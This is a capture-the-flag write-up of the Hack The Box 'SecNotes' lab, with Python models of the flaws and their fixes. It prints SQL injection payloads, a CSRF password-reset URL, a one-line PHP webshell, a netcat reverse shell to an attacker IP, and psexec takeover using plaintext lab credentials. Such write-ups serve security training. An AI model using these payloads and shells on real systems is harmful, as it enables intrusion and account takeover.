htb-secnotes-nl

Today we are going to solve another CTF challenge, "SecNotes", which is available online for those who want to improve their skills in penetration testing and black-box testing. SecNotes is a retired vulnerable lab presented by Hack The Box, which offers online penetration-testing practice matched to your experience level; their collection of vulnerable labs ranges from beginner to expert challenges.

Level: Medium

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are available online they have static IPs; the IP of SecNotes is 10.10.10.97, so let's begin with nmap port enumeration.

c:\PENTEST>nmap -sC -sV 10.10.10.97
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-21 18:18 W. Europe Standard Time
Nmap scan report for 10.10.10.97
Host is up (0.022s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h36m34s, deviation: 4h37m08s, median: -3m26s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2019-01-21T09:15:49-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-01-21 18:15:51
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.69 seconds

c:\PENTEST>

After registering an account and gaining access to the web application, additional functionality to create notes, change password and a contact form are available. The user “tyler” is referenced.
Vulnerability Validation
Weak Password Change Mechanism
A common issue with password change mechanisms is a failure to validate that the user knows the existing password. Password recovery mechanisms also allow users to change their password without knowing the existing password, but they may require an additional verification step, such as sending the reset request to the email address associated with the username. If a malicious user gets a victim to click on a malicious password change request, and validation of the existing password is not required, then they may be able to take control of the account.

Cross-Site Request Forgery (CSRF)
The "Contact Us" form is directed to tyler, and if a malicious password reset request is sent to this user, they might click the link. CSRF tokens would defend against this attack, but they haven't been implemented in the web application. In Burp, the "Change Password" request type is changed from POST to GET, and the malicious URL is constructed.
http://10.10.10.97/change_pass.php?password=123456&confirm_password=123456&submit=submit
The URL is pasted into the message body of the Contact request, and after a short while the credentials tyler:123456 can be used to log into the website.
Once logged in, credentials to access a SMB share are found.
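To show why the forged change_pass.php link works and how a developer closes the hole, here is an added Python model of the handler (not the SecNotes code, which this write-up does not include): weak_change_pass mirrors the behaviour abused above, while safe_change_pass insists on POST, a session-bound CSRF token and the current password. The user store and the hashing scheme are assumptions made for the illustration.

```python
import hmac
import secrets
from hashlib import pbkdf2_hmac

# Added illustration, not the SecNotes source: a constructed in-memory user
# record stands in for the application's user table.
def _hash(password: str, salt: bytes) -> bytes:
    return pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user(password: str) -> dict:
    salt = secrets.token_bytes(16)
    return {"salt": salt, "hash": _hash(password, salt)}

def verify(user: dict, password: str) -> bool:
    return hmac.compare_digest(user["hash"], _hash(password, user["salt"]))

def weak_change_pass(user: dict, method: str, params: dict) -> bool:
    """Models change_pass.php as abused above: the HTTP method is ignored,
    there is no CSRF token and the current password is never checked."""
    new = params.get("password", "")
    if not new or new != params.get("confirm_password"):
        return False
    user.update(make_user(new))
    return True

def safe_change_pass(user: dict, session: dict, method: str, params: dict) -> bool:
    """Hardened handler: POST only, CSRF token bound to the session, and the
    caller must prove knowledge of the current password before it changes."""
    if method != "POST":
        return False
    expected = session.get("csrf_token", "")
    sent = params.get("csrf_token", "")
    if not expected or not hmac.compare_digest(sent.encode(), expected.encode()):
        return False
    if not verify(user, params.get("current_password", "")):
        return False
    new = params.get("password", "")
    if len(new) < 12 or new != params.get("confirm_password"):
        return False
    user.update(make_user(new))
    return True

if __name__ == "__main__":
    # The forged link from the write-up, as the parameters a GET would carry.
    forged = {"password": "123456", "confirm_password": "123456", "submit": "submit"}
    tyler = make_user("original-pass-of-tyler")
    print("weak handler took the forged GET:", weak_change_pass(tyler, "GET", forged))
    tyler = make_user("original-pass-of-tyler")
    session = {"csrf_token": secrets.token_urlsafe(32)}
    print("safe handler took the forged GET:", safe_change_pass(tyler, session, "GET", forged))
```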


Second-Order SQL Injection
Access to the SMB credentials can also be gained by bypassing the authentication mechanism.
The website is tested for SQL injection vulnerabilities. A number of authentication bypass payloads are selected from the SecLists Generic-SQLi list.
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Generic-SQLi.txt
' or 0=0 --
' or 0=0 #
' or 0=0 #"
' or '1'='1' --
' or 1 --'
' or 1=1 --
' or 1=1 or ''='
' or 1=1 or ""=
' or a=a --
' or a=a
') or ('a'='a
'hi' or 'x'='x';
The login request is sent to the Burp Intruder module (CTRL + I), but this test is not successful.

The register page is tested next, and a payload of ' or 1=1-- returns the result "This username is already taken". Other payloads seem to have been accepted and registered as valid user accounts.

Inserting SQL injection payloads into the login form showed nothing. We then tried second-order SQL injection, which is nothing but placing the injection payloads in the sign-up form itself, hoping that the server-side script would show unusual behaviour and reveal some database information.

According to PortSwigger: "Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way."

The query that we used was:

Username: ' or 1='1
Password: ' or 1='1
Confirm password: ' or 1='1

It succeeded and a user account was created. It appears the page heading was where this second-order SQLi was triggered. Either way it served our purpose and gave us three notes from the database; the third one contained what looked like the username and password of a service.
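As an added example (not the SecNotes source), the following Python script with sqlite3 reproduces the second-order pattern described above: the registration and login queries are parameterised and accept the payload quietly, but the notes page concatenates the stored username into its query, and notes_safe shows the bound-parameter fix. The table layout, tyler's note and the password are constructed.

```python
import sqlite3
from typing import List, Optional

# Added illustration, not the SecNotes source. The in-memory database and
# tyler's note are constructed stand-ins for the application's backend.
def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE notes (username TEXT, body TEXT);
        INSERT INTO users VALUES ('tyler', 'constructed-password');
        INSERT INTO notes VALUES ('tyler', 'new-site share creds (constructed)');
    """)
    return db

def register(db: sqlite3.Connection, username: str, password: str) -> None:
    # Parameterised, so the payload is accepted and stored verbatim: the
    # sign-up step itself shows nothing unusual.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def login(db: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    # Also parameterised: login hands the stored username to the session.
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

def notes_vulnerable(db: sqlite3.Connection, session_user: str) -> List[str]:
    # Second-order flaw: the stored username is concatenated into a later
    # query, so ' or '1'='1 yields ... WHERE username = '' or '1'='1'
    query = "SELECT body FROM notes WHERE username = '" + session_user + "'"
    return [row[0] for row in db.execute(query)]

def notes_safe(db: sqlite3.Connection, session_user: str) -> List[str]:
    # Same query with the stored value passed as a bound parameter.
    query = "SELECT body FROM notes WHERE username = ?"
    return [row[0] for row in db.execute(query, (session_user,))]

if __name__ == "__main__":
    db = setup()
    # SQLite does not treat 1 and '1' as equal, so the quoted variant from the
    # payload list is used here; MySQL's loose comparison accepts ' or 1='1 too.
    payload = "' or '1'='1"
    register(db, payload, payload)
    user = login(db, payload, payload)
    print("vulnerable notes page:", notes_vulnerable(db, user))  # tyler's note leaks
    print("safe notes page:      ", notes_safe(db, user))        # []
```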

Tyler seems to be the person responsible for handling users' queries. After obtaining Tyler's password, the first guess was to log into the SMB server running on port 445.

Foothold SMB Share Access
The details are used to access the "new-site" share, which seems to be the IIS webroot.

root@kali:~/htb# smbclient //secnotes.htb/new-site -U "tyler"
Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 19 14:06:14 2018
.. D 0 Sun Aug 19 14:06:14 2018
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018

12978687 blocks of size 4096. 8118293 blocks available

Write access is possible, and a minimal PHP webshell puckie.php with the contents below is uploaded.

<?php echo shell_exec($_GET["cmd"]); ?>

viewing user.txt

http://10.10.10.97:8808/puckie.php?cmd=type%20c:\users\tyler\desktop\user.txt
6fa*****4f3

Upgrade Webshell to Reverse Shell
In order to get a proper shell, the “Invoke-PowerShellTcp.ps1” PowerShell script from the Nishang can be used.
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
The following command is used to execute the reverse shell payload.

http://10.10.10.97:8808/puckiestyle.php?cmd=powershell%20-ep%20bypass%20.\puckieshell443.ps1

or with netcat (instead of Nishang)

root@kali:~/htb# curl 10.10.10.97:8808/puckiestyle.php?cmd=nc+-e+cmd.exe+10.10.14.5+9001
root@kali:~/htb# rlwrap nc -lvp 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from secnotes.htb [10.10.10.97] 49722
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>whoami
whoami
secnotes\tyler

The PowerShell command is URL-encoded in Burp (CTRL+U), the request is sent and a shell as SECNOTES\tyler is received.

C:\pentest>runas /netonly /user:secnotes.htb\tyler cmd
Enter the password for secnotes.htb\tyler:92g!mA8BGjOirkL%OG*&
Attempting to start cmd as user "secnotes.htb\tyler" ...

C:\pentest>

cmd (running as secnotes.htb\tyler)
C:\Windows\system32>dir \\10.10.10.97\new-site
Volume in drive \\10.10.10.97\new-site has no label.
Volume Serial Number is 9CDD-BADA

Directory of \\10.10.10.97\new-site

21/01/2019 10:22 <DIR> .
21/01/2019 10:22 <DIR> ..
21/06/2018 16:26 696    iisstart.htm
21/06/2018 16:26 98.757 iisstart.png
2 File(s) 99.453 bytes
2 Dir(s) 33.213.988.864 bytes free

c:\PENTEST>copy puckie.php \\10.10.10.97\new-site
1 file(s) copied.

c:\PENTEST>copy puckieshell443.ps1 \\10.10.10.97\new-site
1 file(s) copied.

c:\PENTEST>dir \\10.10.10.97\new-site
Volume in drive \\10.10.10.97\new-site has no label.
Volume Serial Number is 9CDD-BADA

Directory of \\10.10.10.97\new-site

21/01/2019 16:02 <DIR> .
21/01/2019 16:02 <DIR> ..
21/06/2018 16:26 696    iisstart.htm
21/06/2018 16:26 98.757 iisstart.png
21/01/2019 10:19 44     puckie.php
21/01/2019  14:05 4.401 puckieshell443.ps1
4 File(s) 99.497 bytes
2 Dir(s) 33.213.988.864 bytes free

c:\PENTEST>

netcat listener

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.97: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.97] 49791: NO_DATA
ls
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\new-site>

Directory: C:\inetpub\new-site

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2018 8:26 AM 696   iisstart.htm
-a---- 6/21/2018 8:26 AM 98757 iisstart.png
-a---- 1/21/2019 1:19 AM 44    puckie.php
-a---- 1/21/2019 5:05 AM 4401  puckieshell443.ps1

Privilege Escalation
Discovery of Administrator Password
Enumeration of C:\ reveals the file "Ubuntu.zip" and a "Distros\Ubuntu" folder. Has Windows Subsystem for Linux (WSL) potentially been installed?
In order to check if WSL has been installed, the following command is issued.

PS C:\> Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss


Hive: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss


Name Property
---- --------
{02893575-609c-4e3b-a426-00f9d State : 1
9b271da} DistributionName : Ubuntu-18.04
Version : 1
BasePath : C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18
.04onWindows_79rhkp1fndgsc\LocalState
PackageFamilyName : CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc

This confirms that WSL has been installed, and that the Linux filesystem has been installed to the path shown above.

The Linux filesystem is enumerated. The “.bash_history” file is checked, and administrative credentials are discovered.

PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs> cd root
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> ls

Directory: C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalStat
e\rootfs\root


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/22/2018 2:56 AM filesystem
-a---- 6/22/2018 3:09 AM 3112 .bashrc
-a---- 6/22/2018 2:41 PM 398 .bash_history
-a---- 6/21/2018 6:00 PM 148 .profile


PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>
> cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>

The same enumeration can also be carried out using bash.

bash -c "whoami;hostname"
bash -c "ls -al /root"
bash -c "cat /root/.bash_history"

A SYSTEM shell can be gained using psexec.

C:\Users\jacco>psexec.exe \\10.10.10.97 -u SECNOTES\Administrator cmd.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Password:u6!4ZwgwOM#^OBf#Nwnh

Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
secnotes\administrator
root@kali:~/htb# psexec.py Administrator@10.10.10.97 
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password: u6!4ZwgwOM#^OBf#Nwnh
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file FtHMilUj.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service gSOW on 10.10.10.97.....
[*] Starting service gSOW.....

[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Author: Puckiestyle
